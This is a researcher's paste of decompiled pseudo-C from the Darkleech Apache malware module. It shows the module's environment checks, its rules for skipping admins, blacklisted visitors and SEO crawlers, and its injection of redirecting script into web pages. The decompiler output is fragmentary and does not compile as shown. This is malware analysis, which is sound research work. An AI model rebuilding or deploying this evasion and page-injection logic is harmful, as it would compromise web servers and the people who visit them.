k@unixfreaxjp /malware]$ date Wed Mar 20 13:06:03 JST 2013 Darkleech Apache Malware Module Reversing function from BIN > ASM to C Reference: http://unixfreaxjp.blogspot.jp/2013/03/darkleech-apache-module.html ---- // checking local environemt loading al variables... _CHECK_SITE_KERNEL() { void ebp; /* unknown */ ebp = esp; return 1; } _CHECK_PROC() { /* unknown */ void ebx; /* unknown */ void esi; /* unknown */ void edi; /* unknown */ void Vfffffec4; /* unknown */ void Vfffffec8; /* unknown */ void Vfffffecc; /* unknown */ void Vfffffed0; /* unknown */ void Vfffffed4; L00003117(); ebx = ebx + 0x4941; esp = esp - 0x13c; *(ebp - 0x10) = *gs:0x14]; eax = 0; *esp = *( *(ebx + -176)); for(*(ebp + -296) = L00002E50(); 1; L00002DE0()) { *esp = *(ebp + -296); eax = L00002FD0(); if(eax == 0) { goto L00003b0e; } edi = eax + 0xb; *esp = edi; Vfffffec4 = *( *(ebx + -156)); *esp = edi; esi = L00002E90(); if(esi != L00002CF0()) { continue; } esi = ebp + -144; Vfffffec8 = 0x80; Vfffffec4 = 0; *esp = esi; L00002EF0(); Vfffffed4 = edi; Vfffffecc = 0x80; Vfffffec8 = 1; Vfffffec4 = 0x7f; Vfffffed0 = *( *(ebx + -308)); *esp = esi; L00002BD0(); *esp = esi; Vfffffec4 = *( *(ebx + -60)); eax = L00002F40(); *(ebp + -292) = eax; if(eax == 0) { continue; } esi = ebp + -272; Vfffffec8 = 0x80; Vfffffec4 = 0; *esp = esi; L00002EF0(); Vfffffec4 = 0x7f; *esp = esi; Vfffffec8 = *(ebp + -292); L00002CC0(); Vfffffec4 = esi; *esp = *( *( *( *(ebx + -300)) + 0xc)); *(ebp + -288) = L00002FB0(); eax = *( *(ebx + -316)); *(ebp + -300) = eax; if(eax > 0) { eax = *(ebx + -116); esi = 0; edi = *eax; do { eax = *(edi + esi * 4); Vfffffec4 = eax; *esp = *(ebp + -288); if(L00002CE0() != 0) { goto L00003b02; } esi = esi + 1; } while(esi != *(ebp + -300)); } *esp = *(ebp + -292); } L00003b02: *esp = *(ebp + -292); L00002DE0(); eax = 0; goto L00003b10; L00003b0e: al = 1; L00003b10: edx = *(ebp - 0x10) ^ *gs:0x14]; if(== ) { esp = esp + 0x13c; return; } L00006F28(); } _CHECK_UTMP() { /* unknown */ void ebx; /* unknown */ void esi; /* unknown */ void edi; /* unknown */ void Vfffffdc4; /* unknown */ void Vfffffdc8; /* unknown */ void Vfffffdcc; /* unknown */ void Vfffffdd0; /* unknown */ void Vfffffdd4; /* unknown */ void Vfffffdd8; /* unknown */ void Vfffffddc; L00003117(); ebx = ebx + 0x4711; esp = esp - 0x23c; *(ebp - 0x10) = *gs:0x14]; eax = 0; Vfffffdc4 = 0; *esp = ebx + -4905; edi = L00002E70(); eax = 1; if(edi < 0) { *(ebp + -544) = ebp + -440; L00003c03: do { Vfffffdc8 = 0x180; *esp = edi; Vfffffdc4 = *(ebp + -544); if(L00003020() != 0x180) { goto L00003d0b; } if(*(ebp + -440) != 7) { goto L00003c03; } eax = *(ebp - 0x5c); if(eax > 0) { *esp = eax; *esp = L00002B60(); L00002F70(); } *esp = ebp + -396; eax = L00002EA0(); esi = *(eax + 8); edx = *eax; if(esi != 0) { *esp = edx; if(L00002DF0() == 0) { goto L00003c03; } } Vfffffddc = ebp + -432; Vfffffdd4 = ebx + -4891; eax = *(ebx + -444); esi = ebp - 0x36; Vfffffdd8 = 0x20; Vfffffdcc = 0x26; Vfffffdc8 = 1; Vfffffdc4 = 0x26; Vfffffdd0 = *eax; *esp = esi; L00002BD0(); Vfffffdc8 = ebp + -528; Vfffffdc4 = esi; *esp = 3; if(L00002C50() != 0) { break; } *esp = 0; } while(L00002C90() - *(ebp + -472) > 0x12b); eax = 0; } L00003cf4: edx = *(ebp - 0x10) ^ *gs:0x14]; if(== ) { esp = esp + 0x23c; return; L00003d0b: *esp = edi; L00002AF0(); eax = 1; goto L00003cf4; } L00006F28();} _CHECK_PROC() { /* unknown */ void ebx; /* unknown */ void esi; /* unknown */ void edi; /* unknown */ void Vfffffec4; /* unknown */ void Vfffffec8; /* unknown */ void Vfffffecc; /* unknown */ void Vfffffed0; /* unknown */ void Vfffffed4; L00003117(); ebx = ebx + 0x4941; esp = esp - 0x13c; *(ebp - 0x10) = *gs:0x14]; eax = 0; *esp = *( *(ebx + -176)); for(*(ebp + -296) = L00002E50(); 1; L00002DE0()) { *esp = *(ebp + -296); eax = L00002FD0(); if(eax == 0) { goto L00003b0e; } edi = eax + 0xb; *esp = edi; Vfffffec4 = *( *(ebx + -156)); *esp = edi; esi = L00002E90(); if(esi != L00002CF0()) { continue; } esi = ebp + -144; Vfffffec8 = 0x80; Vfffffec4 = 0; *esp = esi; L00002EF0(); Vfffffed4 = edi; Vfffffecc = 0x80; Vfffffec8 = 1; Vfffffec4 = 0x7f; Vfffffed0 = *( *(ebx + -308)); *esp = esi; L00002BD0(); *esp = esi; Vfffffec4 = *( *(ebx + -60)); eax = L00002F40(); *(ebp + -292) = eax; if(eax == 0) { continue; } esi = ebp + -272; Vfffffec8 = 0x80; Vfffffec4 = 0; *esp = esi; L00002EF0(); Vfffffec4 = 0x7f; *esp = esi; Vfffffec8 = *(ebp + -292); L00002CC0(); Vfffffec4 = esi; *esp = *( *( *( *(ebx + -300)) + 0xc)); *(ebp + -288) = L00002FB0(); eax = *( *(ebx + -316)); *(ebp + -300) = eax; if(eax > 0) { eax = *(ebx + -116); esi = 0; edi = *eax; do { eax = *(edi + esi * 4); Vfffffec4 = eax; *esp = *(ebp + -288); if(L00002CE0() != 0) { goto L00003b02; } esi = esi + 1; } while(esi != *(ebp + -300)); } *esp = *(ebp + -292); } L00003b02: *esp = *(ebp + -292); L00002DE0(); eax = 0; goto L00003b10; L00003b0e: al = 1; L00003b10: edx = *(ebp - 0x10) ^ *gs:0x14]; if(== ) { esp = esp + 0x13c; return; } L00006F28(); } // Cheking all request... _CHECK_RAW_COOKIE() { L00006F23(); ecx = ecx + 0x5137; (save)ebp; ebp = esp; (restore)ebp; return 0; } /* to_hex() * _CHECK_RAW_COOKIE() */ L00006f23() { ecx = *esp; } _CHECK_REFERER_IS_HOST() { void ebp; /* unknown */ ebp = esp; return 1; } _CHECK_LOCAL_IP() { /* unknown */ void ebx; L00003117(); ebx = ebx + 0x3dd3; esp = esp - 4; *esp = *( *(ebx + -152)); L00002D60(); ecx = *(ebx + -388) + 0x60; do { if(*edx <= eax && eax <= *(edx + 4)) { goto L0000453b; } edx = edx + 8; } while(edx != ecx); esp = esp + 4; return 1; L0000453b: esp = esp + 4; return 0; } _CHECK_BLACKLIST() { /* unknown */ void ebx; /* unknown */ void Vffffffdc; /* unknown */ void Vffffffe0; /* unknown */ void Vffffffe4; /* unknown */ void Vffffffe8; L00003117(); ebx = ebx + 0x45a3; esp = esp - 0x24; *esp = *( *(ebx + -152)); edx = *( *( *( *(ebx + -300)) + 0xc)); Vffffffdc = L00002B50(); Vffffffe4 = 0xfff; Vffffffe0 = 1; Vffffffe8 = edx; *esp = ebp - 8; edx = 1; if(L00002D50() != 2) { *esp = *(ebp - 8); L00002C60(); edx = 0; } esp = esp + 0x24; return edx; } _CHECK_SITE_ADMIN() { /* unknown */ void ebx; /* unknown */ void esi; /* unknown */ void edi; L00003117(); ebx = ebx + 0x4a61; esp = esp - 0x3c; eax = *( *( *(ebx + -300)) + 0xc); *(ebp - 0x20) = eax; *esp = *( *(ebp - 0x20) + 0xd8); *(ebp - 0x14) = L00002CF0(); eax = *( *(ebx + -96)); *(ebp - 0x24) = eax; if(eax > 0) { *(ebp - 0x1c) = 0; *(ebp - 0x38) = *( *(ebx + -400)); do { eax = *(ebp - 0x38); edi = *(eax + *(ebp - 0x1c) * 4); *(ebp - 0x34) = edi; *esp = *(ebp - 0x34); eax = L00002CF0(); edx = *(ebp - 0x14) - eax; *(ebp - 0x10) = eax; *(ebp - 0x28) = edx; if(edx > 0) { if(*(ebp - 0x10) <= 0) { goto L00003957; } *(ebp - 0x18) = 0; edx = *( *(ebp - 0x20) + 0xdc); *(ebp - 0x30) = edx; *(ebp - 0x2c) = *(L00002E00()); do { esi = *(ebp - 0x30); ecx = *(ebp - 0x34); esi = esi + *(ebp - 0x18); *(ebp - 0x44) = 0; do { edi = *esi; edx = *(ebp - 0x2c); *(ebp - 0x40) = edi; if(*(edx + edi * 4) != *ecx) { goto L00003934; } *(ebp - 0x44) = *(ebp - 0x44) + 1; esi = esi + 1; edi = *(ebp - 0x44); ecx = ecx + 1; } while(*(ebp - 0x10) > edi); goto L00003957; L00003934: *(ebp - 0x18) = *(ebp - 0x18) + 1; } while(*(ebp - 0x28) != *(ebp - 0x18)); } *(ebp - 0x1c) = *(ebp - 0x1c) + 1; } while(*(ebp - 0x1c) != *(ebp - 0x24)); } eax = 1; goto L00003969; L00003957: *esp = *( *(ebx + -152)); L00002F70(); eax = 0; L00003969: esp = esp + 0x3c; } _CHECK_REFERER_IS_SEO() { /* unknown */ void ebx; /* unknown */ void esi; /* unknown */ void edi; /* unknown */ void Vffffffc4; L00003117(); ebx = ebx + 0x4d81; esp = esp - 0x3c; Vffffffc4 = *( *(ebx + -12)); *esp = *( *( *( *(ebx + -300)) + 0xc) + 0xa0); eax = L00002D00(); *(ebp - 0x30) = eax; if(eax != 0) { *esp = eax; *(ebp - 0x10) = L00002CF0(); eax = *( *(ebx + -92)); *(ebp - 0x1c) = eax; if(eax > 0) { *(ebp - 0x18) = 0; *(ebp - 0x2c) = *( *(ebx + -164)); do { edx = *(ebp - 0x2c); eax = *(edx + *(ebp - 0x18) * 4); *(ebp - 0x28) = eax; *esp = *(ebp - 0x28); eax = L00002CF0(); esi = *(ebp - 0x10) - eax; edi = eax; *(ebp - 0x20) = esi; if(esi > 0) { if(eax <= 0) { goto L00003643; } *(ebp - 0x14) = 0; *(ebp - 0x24) = *(L00002E00()); do { eax = *(ebp - 0x30); ecx = 0; *(ebp - 0x34) = eax + *(ebp - 0x14); do { edx = *(ecx + *(ebp - 0x34)); eax = *( *(ebp - 0x28) + ecx); if(*( *(ebp - 0x24) + edx * 4) != eax) { goto L0000361d; } ecx = ecx + 1; } while(edi > ecx); goto L00003643; L0000361d: *(ebp - 0x14) = *(ebp - 0x14) + 1; } while(*(ebp - 0x20) != *(ebp - 0x14)); } *(ebp - 0x18) = *(ebp - 0x18) + 1; } while(*(ebp - 0x18) != *(ebp - 0x1c)); } } esp = esp + 0x3c; return 0; L00003643: esp = esp + 0x3c; return 1; } // Malware redirection Code Injection is here... _INJECT_SAVE(A8) //preparation... /* unknown */ void A8; { /* unknown */ void V0; /* unknown */ void V4; /* unknown */ void V8; /* unknown */ void Vc; /* unknown */ void Vfffffff4; /* unknown */ void Vfffffff8; /* unknown */ void Vfffffffc; Vfffffff8 = esi; esi = A8; Vfffffff4 = ebx; L00003117(); ebx = ebx + 0x4008; Vfffffffc = edi; if(esi == 0 || *esi == 0) { L000042d6: eax = 0; L000042d8: ebx = Vfffffff4; esi = Vfffffff8; edi = Vfffffffc; return; } V0 = *( *(ebx + -276)); *esp = *( *(ebx + -220)); eax = L00002F40(); edi = eax; if(eax == 0) { goto L000042d6; } *esp = esi; *esp = esi; V0 = L00002CF0() + 1; *esp = 0; esi = L00002CB0(); Vc = esi; V0 = 1; *esp = edi; V8 = L00002C90(); V4 = ebx + -4885; L00002AE0(); *esp = edi; L00002DE0(); eax = 1; goto L000042d8; } _INJECT_SKIP(A8, Ac) // checking Blacklist skipping.. /* unknown */ void A8; /* unknown */ void Ac; { /* unknown */ void Vffffffc8; /* unknown */ void Vffffffcc; /* unknown */ void Vffffffd0; /* unknown */ void Vffffffe8; (save)edi; (save)esi; (save)ebx; esp = esp - 0x2c; eax = A8; eax = L00003117(); ebx = ebx + 0x39ab; edi = *(eax + 4); eax = eax + 4; *(ebp - 0x24) = eax; if(edi != eax) { eax = Ac + 4; *(ebp - 0x20) = eax; L0000494e: do { edx = *(edi + 8); if(edx == *(ebx + -396)) { eax = *( *( *( *( *(ebx + -300)) + 0xc) + 4) + 0x50); *esp = eax; *(L00002EE0()) = *(ebp - 0x20); } else { eax = ebp - 0x14; Vffffffcc = eax; eax = ebp - 0x10; Vffffffd0 = 0; Vffffffc8 = eax; *esp = edi; eax = *(edx + 0x10)(); if(eax != 0) { edi = *edi; if(edi == *(ebp - 0x24)) { break; } else { goto L0000494e; } } eax = *( *( *( *( *(ebx + -300)) + 0xc) + 4) + 0x50); Vffffffc8 = eax; eax = *(ebp - 0x14) + 1; *esp = eax; eax = L00002B20(); Vffffffc8 = 0; esi = eax; *esp = esi; Vffffffcc = *(ebp - 0x14) + 1; eax = L00002EF0(); eax = *(ebp - 0x14); *esp = esi; Vffffffcc = eax; Vffffffc8 = *(ebp - 0x10); eax = L00002DD0(); eax = *( *( *( *( *(ebx + -300)) + 0xc) + 4) + 0x50); *esp = esi; Vffffffd0 = eax; eax = *(ebx + -340); Vffffffcc = eax; eax = *(ebp - 0x14); Vffffffc8 = eax; eax = L00002A50(); edx = *(ebp - 0x20); ecx = edx; *eax = edx; } edx = *(ecx + 4); *(eax + 4) = edx; edx = *(ecx + 4); *(ecx + 4) = eax; *edx = eax; edi = *edi; } while(edi != *(ebp - 0x24)); } esp = esp + 0x2c; (restore)ebx; (restore)esi; (restore)edi; return; (save)ebp; ebp = esp; (save)ebx; L00003117(); ebx = ebx + 0x3873; esp = esp - 0x14; Vffffffe8 = 4; *esp = A8; eax = L00002D90(); *eax = 1; esp = esp + 0x14; (restore)ebx; } _INJECT_LOAD() // loading javascript / html redirecting codes { /* unknown */ void V0; /* unknown */ void V4; /* unknown */ void V8; /* unknown */ void Vffffffc8; /* unknown */ void Vffffffcc; /* unknown */ void Vffffffd0; /* unknown */ void Vffffffd8; /* unknown */ void Vffffffdc; /* unknown */ void Vffffffe0; /* unknown */ void Vffffffe4; /* unknown */ void Vffffffe8; /* unknown */ void Vffffffec; /* unknown */ void Vfffffff0; /* unknown */ void Vfffffff4; /* unknown */ void Vfffffff8; /* unknown */ void Vfffffffc; Vfffffff4 = ebx; L00003117(); ebx = ebx + 0x2c8e; Vfffffff0 = *gs:0x14]; eax = 0; Vfffffff8 = esi; Vfffffffc = edi; edx = 0; if(L00002A20() == 0) { L00005660: eax = edx; edx = Vfffffff0 ^ *gs:0x14]; if(!= ) { goto L0000580a; } ebx = Vfffffff4; esi = Vfffffff8; edi = Vfffffffc; return; } eax = *(ebx + -60); edi = *(ebx + -220); V0 = *eax; *esp = *edi; eax = L00002F40(); esi = eax; if(eax != 0) { *esp = *edi; eax = L00002C20(); V0 = eax; Vffffffd0 = V0; *esp = *( *( *( *(ebx + -300)) + 0xc)); V8 = esi; V4 = 1; edi = L00002D90(); *esp = edi; V0 = Vffffffd0; L00002BC0(); *esp = esi; L00002DE0(); V0 = 0xa; *esp = edi; eax = L00002A30(); Vffffffc8 = eax; if(eax != 0) { eax = eax - edi; if(eax > 7) { goto L00005717; } } } L0000570b: edx = L00002BE0(); goto L00005660; L00005717: esi = & Vffffffdc; *esp = esi; Vffffffdc = 0; Vffffffe0 = 0; Vffffffe4 = 0; Vffffffe8 = 0; Vffffffec = 0; V8 = 0x14; V4 = eax; V0 = edi; L00002D40(); *esp = esi; V8 = 0; V4 = 0xa; V0 = 0; *esp = 0; esi = L00002D30(); if(L00002C90() - esi > 0x257) { goto L0000570b; } esi = !Vffffffc8 + Vffffffd0 + edi; edx = esi + 1; V0 = edx; Vffffffcc = V0; *esp = *( *( *( *(ebx + -300)) + 0xc)); V0 = 0; edi = L00002D90(); *esp = edi; V4 = Vffffffcc; L00002EF0(); V4 = esi; *esp = edi; V0 = Vffffffc8 + 1; L00002DD0(); V4 = & Vffffffd8; *esp = edi; *esp = edi; V0 = L00002CF0(); edx = L00002AA0(); goto L00005660; L0000580a: L00006F28(); } _INJECT_DO(A8, Ac, A14) // do teh nasty stuff to write html.. /* unknown */ void A8; /* unknown */ void Ac; /* unknown */ void A14; { /* unknown */ void ebx; /* unknown */ void esi; /* unknown */ void edi; /* unknown */ void Vffffffb4; /* unknown */ void Vffffffb8; /* unknown */ void Vffffffbc; /* unknown */ void Vffffffc0; esp = esp - 0x4c; eax = A8; edx = A8; ebx = ebx + 0x2aa8; eax = *(L00003117() + 4); edx = edx + 4; *(ebp - 0x38) = edx; *(ebp - 0x3c) = eax; if(eax != *(ebp - 0x38)) { *(ebp - 0x30) = 0; *(ebp - 0x20) = Ac + 4; L000058cf: do { edx = *( *(ebp - 0x3c) + 8); if(edx == *(ebx + -396)) { *esp = *( *( *( *( *(ebx + -300)) + 0xc) + 4) + 0x50); eax = L00002EE0(); ecx = *(ebp - 0x20); *eax = ecx; *(eax + 4) = *(ecx + 4); edx = *(ecx + 4); *(ecx + 4) = eax; *edx = eax; eax = *(ebp - 0x3c); edx = *(ebp - 0x38); eax = *eax; *(ebp - 0x3c) = eax; if(eax != edx) { goto L000058cf; } else { break; } } Vffffffb8 = ebp - 0x14; Vffffffbc = 0; Vffffffb4 = ebp - 0x10; *esp = *(ebp - 0x3c); *(edx + 0x10)(); edx = *(ebp - 0x14); if(edx == 0) { *esp = 1; Vffffffb4 = *( *( *( *( *(ebx + -300)) + 0xc) + 4) + 0x50); eax = L00002B20(); *eax = 0; Vffffffb4 = 1; *esp = eax; Vffffffbc = *( *( *( *( *(ebx + -300)) + 0xc) + 4) + 0x50); Vffffffb8 = *(ebx + -340); } else { Vffffffb4 = *( *( *( *( *(ebx + -300)) + 0xc) + 4) + 0x50); *esp = edx + 1; *(ebp - 0x2c) = L00002B20(); Vffffffb4 = 0; Vffffffb8 = *(ebp - 0x14) + 1; *esp = *(ebp - 0x2c); L00002EF0(); Vffffffb8 = *(ebp - 0x14); Vffffffb4 = *(ebp - 0x10); *esp = *(ebp - 0x2c); L00002DD0(); if(*(ebp - 0x30) != 0) { Vffffffb4 = *( *( *( *( *(ebx + -300)) + 0xc) + 4) + 0x50); *esp = *(ebp - 0x14); edi = L00002B20(); Vffffffb4 = 0; *esp = edi; Vffffffb8 = *(ebp - 0x14); L00002EF0(); Vffffffb8 = *(ebp - 0x14); *esp = edi; Vffffffb4 = *(ebp - 0x2c); L00002DD0(); *(ebp - 0x34) = 0; } else { ecx = *(ebx + -300); edx = *(ebx + -208); esi = *( *ecx + 0xc); Vffffffb4 = *edx; *esp = *(esi + 0xb4); if(L00002CE0() == 0) { *(ebp - 0x28) = 0; } else { if(*( *(ebx + -224)) <= 0) { goto L00005a2f; } edi = 0; do { esi = *( *( *(ebx + -36)) + edi * 4); *esp = esi; *(ebp - 0x40) = L00002CF0(); Vffffffb4 = esi; *esp = *(ebp - 0x2c); eax = L00002F50(); if(eax != 0) { goto L000059ed; } eax = *(ebx + -224); edi = edi + 1; } while(*eax > edi); edi = 1; *(ebp - 0x28) = 0; goto L000059f8; L000059ed: *(ebp - 0x28) = eax; *(ebp - 0x28) = 0; edi = *(ebp - 0x28); L000059f8: edx = *(ebx + -300); ecx = *(ebx + -208); esi = *( *edx + 0xc); Vffffffb4 = *ecx; *esp = *(esi + 0xb4); if(L00002CE0() != 0 && edi != 0) { goto L00005a2f; } } eax = L00002C30(); esi = eax; if(eax == 0) { goto L00005cf2; } *esp = eax; edx = *(ebx + -300); Vffffffb4 = L00002CF0() + 0x32; *esp = *( *( *edx + 0xc)); ecx = *(ebx + -208); edx = *(ebx + -300); *(ebp - 0x24) = L00002D90(); Vffffffb4 = *ecx; *esp = *( *( *edx + 0xc) + 0xb4); if(L00002CE0() == 0) { Vffffffc0 = esi; Vffffffb8 = -1; Vffffffb4 = 1; Vffffffbc = *( *(ebx + -272)); *esp = *(ebp - 0x24); L00003000(); } else { Vffffffc0 = esi; Vffffffb8 = -1; Vffffffb4 = 1; Vffffffbc = *( *(ebx + -352)); *esp = *(ebp - 0x24); L00003000(); } *esp = *(ebp - 0x24); *(ebp - 0x34) = L00002CF0(); Vffffffb4 = *( *( *( *( *(ebx + -300)) + 0xc) + 4) + 0x50); *esp = *(ebp - 0x34) + *(ebp - 0x14); edi = L00002B20(); Vffffffb4 = 0; *esp = edi; Vffffffb8 = *(ebp - 0x34) + *(ebp - 0x14); L00002EF0(); Vffffffb8 = *(ebp - 0x28); *esp = edi; Vffffffb4 = *(ebp - 0x2c); L00002DD0(); eax = *(ebp - 0x34); ecx = *(ebp - 0x28); Vffffffb8 = eax; edx = *(ebp - 0x24); esi = edi + ecx; *esp = esi; Vffffffb4 = edx; L00002DD0(); eax = *(ebp - 0x14); edx = *(ebp - 0x2c) + *(ebp - 0x28); esi = esi + *(ebp - 0x34); Vffffffb4 = edx; *esp = esi; Vffffffb8 = eax - *(ebp - 0x28); L00002DD0(); L00002CA0(); *esp = -1; L00002C10(); L00002E10(); *(ebp - 0x30) = 1; goto L00005a80; L00005a2f: Vffffffb4 = *( *(esi + 4) + 0x50); *esp = *(ebp - 0x14); L00002B20(); edi = eax; Vffffffb4 = 0; *esp = edi; Vffffffb8 = *(ebp - 0x14); L00002EF0(); Vffffffb8 = *(ebp - 0x14); *esp = edi; Vffffffb4 = *(ebp - 0x2c); L00002DD0(); *(ebp - 0x34) = 0; } L00005a80: Vffffffbc = *( *( *( *( *(ebx + -300)) + 0xc) + 4) + 0x50); Vffffffb8 = *(ebx + -340); *(ebp - 0x34) = *(ebp - 0x34) + *(ebp - 0x14); *esp = edi; Vffffffb4 = *(ebp - 0x34); } eax = L00002A50(); edx = *(ebp - 0x20); A14 = eax; ecx = A14; *A14 = edx; *(ecx + 4) = *(edx + 4); eax = *(edx + 4); *(edx + 4) = ecx; edx = *(ebp - 0x38); *eax = ecx; eax = *( *(ebp - 0x3c)); *(ebp - 0x3c) = eax; } while(eax != edx); } esp = esp + 0x4c; return 1; L00005cf2: Vffffffbc = A14; Vffffffb8 = *(ebp - 0x3c); Vffffffb4 = Ac; *esp = A8; L00002B10(); esp = esp + 0x4c; return 0; } --- @unixfreaxjp